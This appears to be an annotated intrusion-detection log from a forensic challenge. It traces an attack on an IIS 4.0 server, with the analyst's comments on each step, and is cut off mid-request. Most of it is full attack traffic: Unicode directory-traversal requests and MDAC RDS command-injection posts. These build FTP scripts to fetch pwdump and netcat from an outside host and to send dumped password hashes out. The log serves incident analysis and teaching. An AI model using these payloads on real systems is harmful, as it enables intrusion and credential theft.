!@# Apologies in advance for the typos.
!@#
!@#
[**] Outbound http Response [**]
02/04-05:25:14.555344 172.16.1.106:80 -> 213.116.251.162:1764
TCP TTL:127 TOS:0x0 ID:54134 IpLen:20 DgmLen:267 DF
***AP*** Seq: 0x2CAE8C2F Ack: 0x8E35E9AE Win: 0x20AE TcpLen: 20
HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Date: Sun, 04 Feb 20
01 12:24:10 GMT..Content-Type: text/html..Set-Cookie: ASPSESSION
IDGQQGGQZK=KPGNFIPAKMIDBOCJNGOAAHBD; path=/..Cache-control: priv
ate..Transfer-Encoding: chunked....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# First breach, gets listing of boot.ini
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:25:22.525676 213.116.251.162:1765 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11031 IpLen:20 DgmLen:496 DF
***AP*** Seq: 0x8E406992 Ack: 0x2CAE9E9B Win: 0x2238 TcpLen: 20
GET /guest/default.asp/....../....../..%AF../..%C0%AF../boot.ini
HTTP/1.1..Accept: image/gif, image/x-xbitmap, image/jpeg, image
/pjpeg, application/vnd.ms-excel, application/msword, applicatio
n/vnd.ms-powerpoint, */*..Accept-Language: en-us..Accept-Encodin
g: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01
; Windows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connectio
n: Keep-Alive..Cookie: ASPSESSIONIDGQQGGQZK=KPGNFIPAKMIDBOCJNGOA
AHBD....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Need following segments
[**] Outbound http Response [**]
02/04-05:25:22.559828 172.16.1.106:80 -> 213.116.251.162:1765
TCP TTL:127 TOS:0x0 ID:58998 IpLen:20 DgmLen:200 DF
***AP*** Seq: 0x2CAE9E9B Ack: 0x8E406B5A Win: 0x1DD4 TcpLen: 20
HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Date: Sun, 04 Feb 20
01 12:24:18 GMT..Content-Type: text/html..Cache-control: private
..Transfer-Encoding: chunked....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Failed attempt to list contents of /mdac/ directory
[**] Outbound http Response [**]
02/04-05:26:35.937245 172.16.1.106:80 -> 213.116.251.162:1769
TCP TTL:127 TOS:0x0 ID:62326 IpLen:20 DgmLen:374 DF
***AP*** Seq: 0x2CAFCE0E Ack: 0x8F72C638 Win: 0x20A5 TcpLen: 20
HTTP/1.1 403 Access Forbidden..Server: Microsoft-IIS/4.0..Date:
Sun, 04 Feb 2001 12:25:31 GMT..Connection: close..Content-Type:
text/html..Content-Length: 172....Directory L
isting Denied.Directory Listing Denied<
/h1>This Virtual Directory does not allow contents to be listed.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# First use of MDAC RDS Vulnerability to concatenate 'werd' to file 'c:\fun'. Likely just testing exploit.
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:27:08.159193 213.116.251.162:1771 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11060 IpLen:20 DgmLen:745 DF
***AP*** Seq: 0x8FEE9575 Ack: 0x2CB04B6E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 551..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 342..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .w.e.r.d. .>.>. .c.:.\.f.u.n.".).|.'.......d.r.i.v.e.r.=
.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.)
.}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o
.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--.
.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses Unicode exploit to check contents of file
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:27:15.708044 213.116.251.162:1772 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11071 IpLen:20 DgmLen:491 DF
***AP*** Seq: 0x900CDB75 Ack: 0x2CB0698D Win: 0x2238 TcpLen: 20
GET /guest/default.asp/....../....../..%AF../..%C0%AF../fun HTTP
/1.1..Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpe
g, application/vnd.ms-excel, application/msword, application/vnd
.ms-powerpoint, */*..Accept-Language: en-us..Accept-Encoding: gz
ip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Win
dows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Ke
ep-Alive..Cookie: ASPSESSIONIDGQQGGQZK=KPGNFIPAKMIDBOCJNGOAAHBD.
...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Unicode exploit is confirmed
!@# Need following segments
[**] Outbound http Response [**]
02/04-05:27:15.714436 172.16.1.106:80 -> 213.116.251.162:1772
TCP TTL:127 TOS:0x0 ID:1911 IpLen:20 DgmLen:200 DF
***AP*** Seq: 0x2CB0698D Ack: 0x900CDD38 Win: 0x2075 TcpLen: 20
HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Date: Sun, 04 Feb 20
01 12:26:11 GMT..Content-Type: text/html..Cache-control: private
..Transfer-Encoding: chunked....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC exploit to create an FTP script file to download toolkit
!@# Toolkit is (samdump.dll, pdump.exe and nc.exe)
!@# nc.exe is version 1.10 (you can see the version string in the FTP data stream later on)
!@# Judging from the size of pdump.exe in the ftp control channel traffic, this looks like
!@# pwdump2.exe (32768 bytes). This is supported by the size of samdump.dll (36,864 bytes)
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:32:51.574859 213.116.251.162:1778 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11126 IpLen:20 DgmLen:759 DF
***AP*** Seq: 0x951052A9 Ack: 0x2CB58902 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 565..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 356..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .u.s.e.r. .j.o.h.n.a.2.k. .>. .f.t.p.c.o.m.".).|.'......
.d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r.
.(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h
.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!
YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:32:58.852572 213.116.251.162:1780 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11140 IpLen:20 DgmLen:757 DF
***AP*** Seq: 0x952D922A Ack: 0x2CB5A5D6 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 563..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 354..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .h.a.c.k.e.r.2.0.0.0. .>.>. .f.t.p.c.o.m.".).|.'.......d
.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(
.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t
.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YO
UR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:33:05.873985 213.116.251.162:1782 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11151 IpLen:20 DgmLen:767 DF
***AP*** Seq: 0x9549C836 Ack: 0x2CB5C142 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 573..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 364..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .g.e.t. .s.a.m.d.u.m.p...d.l.l. .>.>. .f.t.p.c.o.m.".).|
.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i
.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i
.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!
ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:33:12.881418 213.116.251.162:1784 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11162 IpLen:20 DgmLen:763 DF
***AP*** Seq: 0x95669396 Ack: 0x2CB5DCAE Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 569..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 360..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .g.e.t. .p.d.u.m.p...e.x.e. .>.>. .f.t.p.c.o.m.".).|.'..
.....d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e
.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s
.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!
ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:33:19.823370 213.116.251.162:1786 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11173 IpLen:20 DgmLen:757 DF
***AP*** Seq: 0x95826381 Ack: 0x2CB5F7D4 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 563..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 354..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .g.e.t. .n.c...e.x.e. .>.>. .f.t.p.c.o.m.".).|.'.......d
.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(
.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t
.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YO
UR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:33:26.809677 213.116.251.162:1789 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11189 IpLen:20 DgmLen:745 DF
***AP*** Seq: 0x959EB0E1 Ack: 0x2CB61304 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 551..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 342..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .q.u.i.t. .>.>. .f.t.p.c.o.m.".).|.'.......d.r.i.v.e.r.=
.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.)
.}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o
.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--.
.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to open scripted ftp session to www.nether.net
!@# Uses -n switch to suppress auto-login
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:33:33.995519 213.116.251.162:1791 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11203 IpLen:20 DgmLen:769 DF
***AP*** Seq: 0x95BB80F0 Ack: 0x2CB62EE9 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 575..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 366..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .f
.t.p. .-.s.:.f.t.p.c.o.m. .-.n. .w.w.w...n.e.t.h.e.r...n.e.t.".)
.|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r
.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\
.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...-
-!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:34.938125 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44707 IpLen:20 DgmLen:94 DF
***AP*** Seq: 0x2D782DB2 Ack: 0x2CB633DA Win: 0x832C TcpLen: 20
220 freenet.nether.net FTP server (SunOS 5.7) ready...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:34.944019 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:31863 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2CB633DA Ack: 0x2D782DE8 Win: 0x2202 TcpLen: 20
USER johna2k..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.005368 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44709 IpLen:20 DgmLen:76 DF
***AP*** Seq: 0x2D782DE8 Ack: 0x2CB633E8 Win: 0x832C TcpLen: 20
331 Password required for johna2k...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.034552 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:32119 IpLen:20 DgmLen:57 DF
***AP*** Seq: 0x2CB633E8 Ack: 0x2D782E0C Win: 0x21DE TcpLen: 20
PASS hacker2000..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# FTP login fails, intruder probably does cannot see this.
[**] FTP control channel [**]
02/04-05:33:35.082277 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44710 IpLen:20 DgmLen:62 DF
***AP*** Seq: 0x2D782E0C Ack: 0x2CB633F9 Win: 0x832C TcpLen: 20
530 Login incorrect...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.089514 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:32375 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CB633F9 Ack: 0x2D782E22 Win: 0x21C8 TcpLen: 20
PORT 172,16,1,106,12,64..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.144118 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44711 IpLen:20 DgmLen:78 DF
***AP*** Seq: 0x2D782E22 Ack: 0x2CB63412 Win: 0x832C TcpLen: 20
530 Please login with USER and PASS...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.149295 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:32631 IpLen:20 DgmLen:58 DF
***AP*** Seq: 0x2CB63412 Ack: 0x2D782E48 Win: 0x21A2 TcpLen: 20
RETR samdump.dll..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.202201 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44712 IpLen:20 DgmLen:78 DF
***AP*** Seq: 0x2D782E48 Ack: 0x2CB63424 Win: 0x832C TcpLen: 20
530 Please login with USER and PASS...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.208941 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:32887 IpLen:20 DgmLen:56 DF
***AP*** Seq: 0x2CB63424 Ack: 0x2D782E6E Win: 0x217C TcpLen: 20
RETR pdump.exe..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.255965 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44713 IpLen:20 DgmLen:78 DF
***AP*** Seq: 0x2D782E6E Ack: 0x2CB63434 Win: 0x832C TcpLen: 20
530 Please login with USER and PASS...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.262909 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:33143 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CB63434 Ack: 0x2D782E94 Win: 0x2156 TcpLen: 20
RETR nc.exe..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.314214 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44714 IpLen:20 DgmLen:78 DF
***AP*** Seq: 0x2D782E94 Ack: 0x2CB63441 Win: 0x832C TcpLen: 20
530 Please login with USER and PASS...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.318867 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:33399 IpLen:20 DgmLen:46 DF
***AP*** Seq: 0x2CB63441 Ack: 0x2D782EBA Win: 0x2130 TcpLen: 20
QUIT..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# FTP session terminates with nothing downloaded
[**] FTP control channel [**]
02/04-05:33:35.366953 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44715 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2D782EBA Ack: 0x2CB63447 Win: 0x832C TcpLen: 20
221 Goodbye...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run pdump and concatenate output into file 'new pass'
!@# Since pdump did not download this must fail
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:33:51.024741 213.116.251.162:1793 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11215 IpLen:20 DgmLen:749 DF
***AP*** Seq: 0x95FDA7E9 Ack: 0x2CB67169 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 555..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 346..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .p
.d.u.m.p...e.x.e. .>.>. .n.e.w...p.a.s.s.".).|.'.......d.r.i.v.e
.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d
.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u
.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD
!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to begin a new FTP script called ftpcom2
!@# The purpose of this script is to FTP the file 'new pass' to nether.net
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:34:01.106135 213.116.251.162:1795 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11227 IpLen:20 DgmLen:761 DF
***AP*** Seq: 0x9625AE88 Ack: 0x2CB698E2 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 567..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 358..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .u.s.e.r. .j.o.h.n.a.2.k. .>. .f.t.p.c.o.m.2.".).|.'....
...d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r
. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\
.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!RO
X!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:34:08.113472 213.116.251.162:1797 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11238 IpLen:20 DgmLen:759 DF
***AP*** Seq: 0x9641CA4E Ack: 0x2CB6B430 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 565..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 356..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .h.a.c.k.e.r.2.0.0.0. .>.>. .f.t.p.c.o.m.2.".).|.'......
.d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r.
.(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h
.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!
YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:34:15.232822 213.116.251.162:1799 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11249 IpLen:20 DgmLen:753 DF
***AP*** Seq: 0x965E643C Ack: 0x2CB6D00A Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
